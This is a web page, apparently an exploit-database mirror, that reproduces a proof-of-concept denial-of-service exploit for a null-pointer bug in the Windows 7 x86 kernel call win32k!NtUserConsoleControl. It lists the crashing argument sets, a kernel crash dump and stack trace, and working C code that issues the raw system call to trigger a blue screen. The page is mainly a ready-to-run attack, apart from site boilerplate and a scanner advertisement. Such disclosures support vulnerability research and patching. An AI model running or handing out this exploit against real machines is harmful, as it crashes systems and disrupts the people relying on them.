Registermicrosoft windows kernel win32k!ntuserconsolecontrol denial of service (poc)
▸▸▸ Exploit & Vulnerability >> dos exploit & windows vulnerability
Online Vulnerability Scanner Tools
Code...
/* # Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC) # Author: vportal # Date: 2018-07-27 # Vendor homepage: http://www.microsoft.com # Version: Windows 7 x86 # Tested on: Windows 7 x86 # CVE: N/A # It is possible to trigger a BSOD caused by a Null pointer deference when calling the system # call NtUserConsoleControl with the following arguments: # NtUserControlConsole(1,0,8). # NtUserControlConsole(4,0,8). # NtUserControlConsole(6,0,12). # NtUserControlConsole(2,0,12). # NtUserControlConsole(3,0,20). # NtUserControlConsole(5,0,8). # Different crashes are reproduced for each case. For the second case the crash is showed below: # EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace referencia a la memoria # en 0x%08lx. La memoria no se pudo %s. # FAULTING_IP: # win32k!xxxSetConsoleCaretInfo+c # 93310641 8b0e mov ecx,dword ptr [esi] # TRAP_FRAME: 8c747b2c -- (.trap 0xffffffff8c747b2c) # ErrCode = 00000000 # eax=00000000 ebx=00000000 ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003 # eip=93310641 esp=8c747ba0 ebp=8c747bb0 iopl=0 nv up ei ng nz ac po nc # cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010292 # win32k!xxxSetConsoleCaretInfo+0xc: # 93310641 8b0e mov ecx,dword ptr [esi] ds:0023:00000000=???????? # Resetting default scope # CUSTOMER_CRASH_COUNT: 1 # DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT # BUGCHECK_STR: 0x8E # PROCESS_NAME: Win32k-fuzzer_ # CURRENT_IRQL: 0 # LAST_CONTROL_TRANSFER: from 9330fc27 to 93310641 # STACK_TEXT: # 8c747bb0 9330fc27 00000000 00000003 00000014 win32k!xxxSetConsoleCaretInfo+0xc # 8c747bcc 9330fa8d 00000003 00000000 00000014 win32k!xxxConsoleControl+0x147 # 8c747c20 82848b8e 00000003 00000000 00000014 win32k!NtUserConsoleControl+0xc5 # 8c747c20 012e6766 00000003 00000000 00000014 nt!KiSystemServicePostCall # WARNING: Frame IP not in any known module. Following frames may be wrong. # 0016f204 00000000 00000000 00000000 00000000 0x12e6766 # PoC code: */ #include <Windows.h> extern "C" ULONG CDECL SystemCall32(DWORD ApiNumber, ...) { __asm{mov eax, ApiNumber}; __asm{lea edx, ApiNumber + 4}; __asm{int 0x2e}; } int _tmain(int argc, _TCHAR* argv[]) { int st = 0; int syscall_ID = 0x1160; //NtUserControlConsole ID Windows 7 LoadLibrary(L"user32.dll"); st = (int)SystemCall32(syscall_ID, 4, 0, 8); return 0; } # The vulnerability has only been tested in Windows 7 x86.
Microsoft windows kernel win32k!ntuserconsolecontrol denial of service (poc) Vulnerability / Exploit Source : Microsoft windows kernel win32k!ntuserconsolecontrol denial of service (poc)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes